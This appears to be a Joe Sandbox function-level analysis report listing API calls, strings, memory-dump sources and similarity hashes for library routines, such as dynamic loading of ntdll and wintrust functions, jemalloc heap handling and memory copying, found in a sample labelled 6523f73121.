API String ID: 145871493-1489773717
Opcode ID: e0e37e5d2fcdd5cc90f3259adb08b913280d6f5a1beb7193599b9803355305ac
Instruction ID: f2bbdf6e04f8fb6f1eb981b47ce19a2275b2bc59121cca5e9bb77b70f151b9ae
Opcode Fuzzy Hash: e0e37e5d2fcdd5cc90f3259adb08b913280d6f5a1beb7193599b9803355305ac
Instruction Fuzzy Hash: 09E0BF744C2B469FEF14AF6AC808B127AF8BB07752F02841EEA05C1E51DBB5C000DF11

Function 6D5800D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6D557235), ref: 6D5800D8
GetProcAddress.KERNEL32(00000000,CryptCATAdminCalcHashFromFileHandle2), ref: 6D5800F7
FreeLibrary.KERNEL32(?,6D557235), ref: 6D58010E

Strings

CryptCATAdminCalcHashFromFileHandle2, xrefs: 6D5800F1
wintrust.dll, xrefs: 6D5800D3

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminCalcHashFromFileHandle2$wintrust.dll
API String ID: 145871493-2559046807
Opcode ID: 3f32e29b4e5167eb3869426a91e374987800d57f900494525ab99f9a4cbdcd57
Instruction ID: d95b27b6bb8d67a48f0ab8fd33c476ceaacf607ed25593430320f1579a413efa
Opcode Fuzzy Hash: 3f32e29b4e5167eb3869426a91e374987800d57f900494525ab99f9a4cbdcd57
Instruction Fuzzy Hash: 9AE0BF74486B069BEF14AF6AC9097327AF9A707651F42841EE94981E51D7B09140CB92

Function 6D5A75B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6D5A748B,?), ref: 6D5A75B8
GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 6D5A75D7
FreeLibrary.KERNEL32(?,6D5A748B,?), ref: 6D5A75EC

Strings

RtlNtStatusToDosError, xrefs: 6D5A75D1
ntdll.dll, xrefs: 6D5A75B3

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: RtlNtStatusToDosError$ntdll.dll
API String ID: 145871493-3641475894
Opcode ID: 89bc01f5a6ee81b143770193bd725dbd6649774650ed2d72145d744721be1975
Instruction ID: 55412b71250bbd9b4b4a0562a95b2a2c313d359f39f078f2c1db7135ab40a397
Opcode Fuzzy Hash: 89bc01f5a6ee81b143770193bd725dbd6649774650ed2d72145d744721be1975
Instruction Fuzzy Hash: 4CE0B6B1641B06ABEF046F66C8487157AF8EB0B614F02602DA904D2E01EFB0D04ACF12

Function 6D5AC410 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6D5AC0E9), ref: 6D5AC418
GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6D5AC437
FreeLibrary.KERNEL32(?,6D5AC0E9), ref: 6D5AC44C

Strings

ntdll.dll, xrefs: 6D5AC413
NtQueryVirtualMemory, xrefs: 6D5AC431

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: NtQueryVirtualMemory$ntdll.dll
API String ID: 145871493-2623246514
Opcode ID: 2fbd8931013e3f3505a722a98095b897ab747b18f8defa78bb9d2db0fa93676d
Instruction ID: 16a020e95514d8405545b0ea3ac87bc0acd9afed91b4543080c86dc95158925c
Opcode Fuzzy Hash: 2fbd8931013e3f3505a722a98095b897ab747b18f8defa78bb9d2db0fa93676d
Instruction Fuzzy Hash: 8DE0B674486B0A9BDF147F71C918B257BF8A70AA05F06411FBA04A2E01EBB1D4008B56

Function 6D5A7600 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6D5A7592), ref: 6D5A7608
GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 6D5A7627
FreeLibrary.KERNEL32(?,6D5A7592), ref: 6D5A763C

Strings

NtUnmapViewOfSection, xrefs: 6D5A7621
ntdll.dll, xrefs: 6D5A7603

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: NtUnmapViewOfSection$ntdll.dll
API String ID: 145871493-1050664331
Opcode ID: 4c5b12e16024f5e394cdd7e61b010959a64482196322edc45df3f79e812a7596
Instruction ID: 7b4b9f6d9cd9de0833f84f8afec63db64335e3cfc4b246abb3d23b90ac4cd8e8
Opcode Fuzzy Hash: 4c5b12e16024f5e394cdd7e61b010959a64482196322edc45df3f79e812a7596
Instruction Fuzzy Hash: DFE0B6B1601F05ABDF046F66C9087197AF8E71A795F02511DEA05D2F01EBB0D0048F5A

Function 6D5AC1F0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6D5AC1DE,?,00000000,?,00000000,?,6D55779F), ref: 6D5AC1F8
GetProcAddress.KERNEL32(00000000,WinVerifyTrust), ref: 6D5AC217
FreeLibrary.KERNEL32(?,6D5AC1DE,?,00000000,?,00000000,?,6D55779F), ref: 6D5AC22C

Strings

wintrust.dll, xrefs: 6D5AC1F3
WinVerifyTrust, xrefs: 6D5AC211

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: WinVerifyTrust$wintrust.dll
API String ID: 145871493-2991032369
Opcode ID: e6ec7f9577ff9e978c90d8e587743642480aa6a8bc3204ff4ee03dedbf7e4366
Instruction ID: 1a16ca63f9dabd22de3ab60f3e9488890033f37249f59af544652fd701f84a44
Opcode Fuzzy Hash: e6ec7f9577ff9e978c90d8e587743642480aa6a8bc3204ff4ee03dedbf7e4366
Instruction Fuzzy Hash: 32E0B678082B469BDF147FA1C908B267EF8BF46604F06051DAA05C2F02E7B980008B52

Function 6D5ABE50 Relevance: 7.7, APIs: 5, Instructions: 163memoryCOMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,?,?,6D5ABE49), ref: 6D5ABEC4
RtlCaptureStackBackTrace.NTDLL ref: 6D5ABEDE
memset.VCRUNTIME140(00000000,00000000,-00000008,?,6D5ABE49), ref: 6D5ABF38
RtlReAllocateHeap.NTDLL ref: 6D5ABF83
RtlFreeHeap.NTDLL ref: 6D5ABFA6

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: Heapmemset$AllocateBackCaptureFreeStackTrace
String ID:
API String ID: 2764315370-0
Opcode ID: 68f9e00fdc009439e41d0963815d57fb7b0384834b19732f15ea3df83978cc69
Instruction ID: 03d7eb7d7cb4b271fab60c3f2b2ad7658ed9bb91adc0639bfe930ae7ff3480cb
Opcode Fuzzy Hash: 68f9e00fdc009439e41d0963815d57fb7b0384834b19732f15ea3df83978cc69
Instruction Fuzzy Hash: 92519E71A002168FE718DF68C880BAEB7B2BFC4314F2D8A39D555A7A54D730F9068B80

Function 6D59DDC0 Relevance: 7.7, APIs: 6, Instructions: 152COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6D59DE0D
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6D59DE5F
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6D59DEA3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6D59DEE9

Part of subcall function 6D57FA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 6D57FA4B

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6D58DEFD,?,6D554A68), ref: 6D59DF32

Part of subcall function 6D565E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6D565EDB
Part of subcall function 6D565E90: memset.VCRUNTIME140(ewZm,000000E5,?), ref: 6D565F27
Part of subcall function 6D565E90: LeaveCriticalSection.KERNEL32(?), ref: 6D565FB2

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6D58DEFD,?,6D554A68), ref: 6D59DF65

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: free$CriticalSection$EnterExclusiveLeaveLockReleasememset
String ID:
API String ID: 2543209649-0
Opcode ID: 5a9a9dd8c38dabef1ce2ac4eaef6fdc35053162e5b92a86550d125366f1cc02f
Instruction ID: caa0c328008b99ad8b826042de856045e1f45f5af6a2a22a4401b70bc448f781
Opcode Fuzzy Hash: 5a9a9dd8c38dabef1ce2ac4eaef6fdc35053162e5b92a86550d125366f1cc02f
Instruction Fuzzy Hash: 6251C5766056419BDB19CB28C8807BEB376BFD1304F86081ED91A5BB00E735FD16CB92

Function 6D54CFE0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 134memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6D5CE784), ref: 6D54CFF6
LeaveCriticalSection.KERNEL32(6D5CE784), ref: 6D54D026
VirtualAlloc.KERNEL32(00000000,00100000,00001000,00000004), ref: 6D54D06C
VirtualFree.KERNEL32(00000000,00100000,00004000), ref: 6D54D139

Strings

MOZ_CRASH(), xrefs: 6D54D187

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: CriticalSectionVirtual$AllocEnterFreeLeave
String ID: MOZ_CRASH()
API String ID: 1090480015-2608361144
Opcode ID: 7e90160ac0fd79f74c3c509e21b3b19a2024ea08b6d82c12cdbc26aba8269863
Instruction ID: 7a7718933be7d64b7e1c105a6b579c715cf0938a6d0c4911778a1c90c4f5fc61
Opcode Fuzzy Hash: 7e90160ac0fd79f74c3c509e21b3b19a2024ea08b6d82c12cdbc26aba8269863
Instruction Fuzzy Hash: 7D41E371B00A564FDF18CE7C8C9636A36F4EB89710F12413EE918E7B84EBB15C008B96

Function 6D54E9C0 Relevance: 7.6, APIs: 5, Instructions: 133COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,7FFFFFFE), ref: 6D54EA5C
memset.VCRUNTIME140(7FFFFFFE,00000000,?), ref: 6D54EA76
memcpy.VCRUNTIME140(?,7FFFFFFE,?,?,?,6D551999), ref: 6D54EAC2
memset.VCRUNTIME140(?,00000000,00000000,?,?,?,?), ref: 6D54EADC
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?), ref: 6D54EB27

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: memcpymemset$_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 530858481-0
Opcode ID: 54000d769b1047dc5f425dd99ddc10edd6d116ae3f86ded1c157f31b1569e326
Instruction ID: 845af0693e6eb05d5136ac59ca6c098368cf0f3617fc00e1fafddf60fc21d669
Opcode Fuzzy Hash: 54000d769b1047dc5f425dd99ddc10edd6d116ae3f86ded1c157f31b1569e326
Instruction Fuzzy Hash: A041B2B1A002169FDB18CF68DC84ABE77A8FF54364F254A28E915D7794E730DA04C7E2

Function 6D54EF30 Relevance: 7.6, APIs: 5, Instructions: 128COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6D54EFD7
memcpy.VCRUNTIME140(00000000,?,?), ref: 6D54EFEC
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6D54F02E
memcpy.VCRUNTIME140(00000000,?), ref: 6D54F041
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6D54F065

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: memcpy$_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2665656946-0
Opcode ID: 03507a2ceabdb41a3c907183e8cf7acb1b1b85bfe7986e47e2b3e7c2a30a5fdf
Instruction ID: 254f9522cf684db26b2db6dcc6215d091a849197d38f546c372218b167bacb18
Opcode Fuzzy Hash: 03507a2ceabdb41a3c907183e8cf7acb1b1b85bfe7986e47e2b3e7c2a30a5fdf
Instruction Fuzzy Hash: F741D4B1A002059FCB0CCF78D8909BE7769BFC4324B254628E916DB794EB71ED11C7A2

Function 6D54B630 Relevance: 7.6, APIs: 5, Instructions: 128COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6D54B61E,?,?,?,?,?,00000000), ref: 6D54B6D1
memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?,?,?,6D54B61E,?,?,?,?,?,00000000), ref: 6D54B6E3
memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6D54B61E,?,?,?,?,?,00000000), ref: 6D54B70B
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,6D54B61E,?,?,?,?,?,00000000), ref: 6D54B71D
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,6D54B61E,?,?,?,?,?,00000000), ref: 6D54B79A

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: memcpy$_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2665656946-0
Opcode ID: e4133b4fc2a1d6c002cc734bdb8d61e73fdfda2b1f2153b918ffe15bde6c9c56
Instruction ID: 97358e3de39e7da47bbe01683e3cc4b3cd3a56b685584564d5d7bff5db630525
Opcode Fuzzy Hash: e4133b4fc2a1d6c002cc734bdb8d61e73fdfda2b1f2153b918ffe15bde6c9c56
Instruction Fuzzy Hash: 0041C9B2D041159FCB08DF68DC9056FB7B9BF84320F258669E925E7790D731AD1087D2

Function 6D5AA820 Relevance: 7.6, APIs: 5, Instructions: 106stringCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6D5CF770), ref: 6D5AA858
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6D5AA87B

Part of subcall function 6D5AA9D0: memcpy.VCRUNTIME140(?,?,00000400,?,?,?,6D5AA88F,00000000), ref: 6D5AA9F1

_ltoa_s.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,00000020,0000000A), ref: 6D5AA8FF
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6D5AA90C
LeaveCriticalSection.KERNEL32(6D5CF770), ref: 6D5AA97E

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: CriticalSectionstrlen$EnterLeave_ltoa_smemcpy
String ID:
API String ID: 1355178011-0
Opcode ID: ee784d47133910f02121ae19518858fb0f32e0cc911f4f5088de10069cf3bc73
Instruction ID: b9a87f049fe132cb9778244c7552a93de12987ecd64b74f935f8227450e4769a
Opcode Fuzzy Hash: ee784d47133910f02121ae19518858fb0f32e0cc911f4f5088de10069cf3bc73
Instruction Fuzzy Hash: 8D41A5B4D002489FDB08DFE4D844FAEB7B5FF44324F158629E826AB781D7719941CBA2

Function 6D5A5EF0 Relevance: 7.6, APIs: 5, Instructions: 89COMMON

Download Yara Rule

APIs

?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP140(00000001,00000000,6D5BDCA0,?,?,?,6D57E8B5,00000000), ref: 6D5A5F1F
?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6D57E8B5,00000000), ref: 6D5A5F4B
?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(00000000,?,6D57E8B5,00000000), ref: 6D5A5F7B
?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(6E65475B,00000000,?,6D57E8B5,00000000), ref: 6D5A5F9F
?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6D57E8B5,00000000), ref: 6D5A5FD6

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@?sbumpc@?$basic_streambuf@?sgetc@?$basic_streambuf@?snextc@?$basic_streambuf@Ipfx@?$basic_istream@
String ID:
API String ID: 1389714915-0
Opcode ID: 765524009767f11ecd1e542e4663e4665d8895b3d519d8079a6947981dbab311
Instruction ID: 8866c46b5692ead768ed310d835c16439e7709e108244f0c4bef06ea8a085bb3
Opcode Fuzzy Hash: 765524009767f11ecd1e542e4663e4665d8895b3d519d8079a6947981dbab311
Instruction Fuzzy Hash: 35317A74300A118FDB14CF29C888F2AB7F9FF89315B998958E5568BB95D731EC41CB80

Function 61EAF850 Relevance: 7.6, APIs: 5, Instructions: 54timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 61EAF889
GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61EAF89A
GetCurrentThreadId.KERNEL32 ref: 61EAF8A2
GetTickCount.KERNEL32 ref: 61EAF8AA
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61EAF8B9

Memory Dump Source

Source File: 00000009.00000002.3697149386.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000009.00000002.3695997989.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697489419.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697572051.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697726963.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697822264.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3698534601.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_61e00000_6523f73121.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 11ba3c5eec943ccd272f0a4fc468b32cfef13cd0c029082f67a55811cb38d485
Instruction ID: 8be46cd1f480235cb6d0906dde7f3b0c5fd652d59fe7cf958993e94cb5683476
Opcode Fuzzy Hash: 11ba3c5eec943ccd272f0a4fc468b32cfef13cd0c029082f67a55811cb38d485
Instruction Fuzzy Hash: 8D1170B29553118FCB00DFB9E58855BBBE0FB89654F050939E544CB200EB35D9898B92

Function 6D580D60 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6D543DEF), ref: 6D580D71
VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6D543DEF), ref: 6D580D84
VirtualFree.KERNEL32(00000000,00000000,00008000,?,6D543DEF), ref: 6D580DAF

Strings

<jemalloc>, xrefs: 6D580D92, 6D580DB9
: (malloc) Error in VirtualFree(), xrefs: 6D580D97, 6D580DBE

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: Virtual$Free$Alloc
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 1852963964-2186867486
Opcode ID: d756a606859455b7104c03ed39a56e3851f099c609b6b5776d13642cf8abbdb0
Instruction ID: 5000111c852708a3dd8ed5659bda8fcade21fda18811807093c54885c45bca62
Opcode Fuzzy Hash: d756a606859455b7104c03ed39a56e3851f099c609b6b5776d13642cf8abbdb0
Instruction Fuzzy Hash: B2F0803139667523DB2C216F5C05F3E259D67C2B51F21453BF604DBDC5DA60E40046A7

Function 6D5A1700 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 190COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 6D5A1800

Part of subcall function 6D57CBE8: GetCurrentProcess.KERNEL32(?,6D5431A7), ref: 6D57CBF1
Part of subcall function 6D57CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6D5431A7), ref: 6D57CBFA

Part of subcall function 6D544290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6D583EBD,6D583EBD,00000000), ref: 6D5442A9

Strings

name, xrefs: 6D5A1939
Details, xrefs: 6D5A1925
{marker.name} - {marker.data.name}, xrefs: 6D5A18C7

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: Process$CurrentInit_thread_footerTerminatestrlen
String ID: Details$name${marker.name} - {marker.data.name}
API String ID: 46770647-1733325692
Opcode ID: 16ae2b1055eb38f81ce3d30f89a238db3d89389b8dbff49a3b3960edf5dcdaeb
